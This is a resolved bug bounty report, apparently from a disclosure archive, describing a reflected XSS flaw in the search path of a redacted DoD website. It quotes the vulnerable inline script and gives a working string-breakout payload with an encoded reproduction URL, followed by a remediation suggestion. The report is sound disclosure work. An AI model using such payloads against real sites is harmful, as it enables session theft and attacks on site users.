Loading HuntDB...

Reflected XSS on ███████

Medium
U
U.S. Dept Of Defense
Submitted None
Reported by phibz

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary Reflected XSS on `████████`. ## Description During my explorations I found `█████████/search/node`, which provides a basic search functionality. If we search something, the value is reflected and not properly sanitized. For example if we search `██████████/search/node/chron0x` we can see in the javascript code: ```javascript [...] <script> //Early marking that the browser supports javascript try { document.getElementsByTagName('body')[0].classList.add("js"); } catch(E) { document.getElementsByTagName('body')[0].className += " js"; } var rootN = "https://████/████"; var whoisURL = "/█████████"; var eventTitle = ""; var ████; //Whether the person is on the receiving end of chats var internalPath = 'search/node/chron0x'; </script> [...] ``` Due to improper input sanitization, this is vulnerable to XSS. Inserting the payload `';alert('chron0x');'` into the search field leads to ```javascript [...] <script> //Early marking that the browser supports javascript try { document.getElementsByTagName('body')[0].classList.add("js"); } catch(E) { document.getElementsByTagName('body')[0].className += " js"; } var rootN = "https://████/██████████"; var whoisURL = "/████"; var eventTitle = ""; var ████; //Whether the person is on the receiving end of chats var internalPath = 'search/node/';alert('chron0x');''; </script> [...] ``` This pops an alert box, demonstrating XSS. Note: I am reporting this here, since the footer of `█████████` states `Official United States ████ Website. The █████ ████████.`, and the United States ██████████ underlies the DoD. If this should not belong to the DoD scope I would kindly ask to self close this issue. ## Step-by-step Reproduction Instructions 1. Visit `https://██████████/search/node/%27%3Balert%28%27chron0x%27%29%3B%27` An alert box with `chron0x` pops. I am attaching an image demonstrating the XSS. ## Mitigation/Remediation Actions Sanitize the input for the article parameter, such that certain characters are encoded or not allowed. ## Impact Medium - Data can be stolen, or Javascript can be executed.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected